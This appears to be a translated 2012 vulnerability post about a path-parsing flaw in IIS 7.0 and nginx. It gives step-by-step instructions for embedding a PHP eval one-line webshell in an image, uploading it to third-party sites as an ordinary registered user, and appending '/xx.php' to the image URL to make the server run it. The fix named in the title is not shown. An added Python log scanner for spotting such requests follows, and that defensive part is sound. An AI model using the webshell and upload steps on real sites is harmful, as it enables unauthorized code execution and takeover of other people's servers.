IIS 7.0 websites: the exploit and the fix - Vulnerability warning - Black Bar Safety Net

ID MYHACK58:62201233031
Type myhack58
Reporter Anonymous
Modified 2012-02-05T00:00:00


Taking the currently popular PHP as an example:

First, merge a PHP one-line Trojan into an image. Ways to merge:

① DOS merge: copy 1.gif /b + 1.txt /a php.gif

② Use edjpgcom to merge the image and the one-line Trojan; the comment code is <?php eval($_POST[meckun]);?>

Any image will do.

【Incidentally, how to use edjpgcom: open the folder containing edjpgcom.exe, then drag the image you want to modify onto edjpgcom.exe; edjpgcom.exe will then open automatically, and you write in the code you want.】


<?php eval($_POST[meckun]);?>

Then find an nginx site, register a user, and upload to the forum the image we just merged with the one-line Trojan.

Find the image's address, then append xx.php to the address and open it in the browser.

For example, suppose the image address is www.meckun.cn/upload/1.jpg

Then the address to execute is www.meckun.cn/upload/1.jpg/xx.php

Then xx.php will be generated in that directory. For example: www.meckun.cn/upload/x.php

x.php is the address of our one-line Trojan. Then connect a one-line Trojan client to that address.

Find a site built on IIS 7.0, then find an image upload point that does not require administrative permissions and is available to ordinary registered users. Change the extension of a large PHP webshell to .jpg, upload it, and get the image address.

Append xx.php after the image extension.

Note: xx can be anything you like, as long as the suffix is .php.
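For defenders, the request shape described above (an uploaded image path with a /xx.php segment appended) can be searched for in web server access logs. The following is an added example, not part of the original article: the log lines are constructed, and the function names and extension lists are assumptions to adapt to the site.

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions an upload directory normally serves as static files (assumed list).
STATIC_EXTS = {"jpg", "jpeg", "gif", "png", "bmp", "ico", "txt"}
# Suffixes that route a request to the PHP handler (assumed list).
SCRIPT_EXTS = {"php", "php3", "php5", "phtml"}
# Request line inside a common/combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def _ext(segment):
    """Lower-cased extension of one path segment, or '' if it has none."""
    name, dot, ext = segment.rpartition(".")
    return ext.lower() if dot and name else ""

def is_pathinfo_abuse(target):
    """True if a static-file segment is followed by a segment with a script suffix."""
    # Ignore the query string; decode twice so %2F and %252F separators are seen.
    path = unquote(unquote(urlsplit(target).path))
    segments = [s for s in path.split("/") if s]
    for i, seg in enumerate(segments[:-1]):
        if _ext(seg) in STATIC_EXTS and any(_ext(s) in SCRIPT_EXTS for s in segments[i + 1:]):
            return True
    return False

def scan_log(lines):
    """Return (client, method, target) for every log line matching the pattern."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_pathinfo_abuse(m.group("target")):
            hits.append((line.split(" ", 1)[0], m.group("method"), m.group("target")))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2012:10:01:11 +0000] "POST /upload HTTP/1.1" 200 512',
    '203.0.113.7 - - [05/Feb/2012:10:01:15 +0000] "GET /upload/1.jpg HTTP/1.1" 200 20480',
    '203.0.113.7 - - [05/Feb/2012:10:01:20 +0000] "GET /upload/1.jpg/xx.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [05/Feb/2012:10:01:31 +0000] "POST /upload/1.jpg%2Fa.PHP?x=1 HTTP/1.1" 200 17',
    '198.51.100.4 - - [05/Feb/2012:10:02:00 +0000] "GET /forum/index.php?img=1.jpg HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, method, target in scan_log(SAMPLE_LOG):
        print(f"suspicious: {ip} {method} {target}")
```

Hits that follow an upload from the same client, as in the sample, are the ones to triage first.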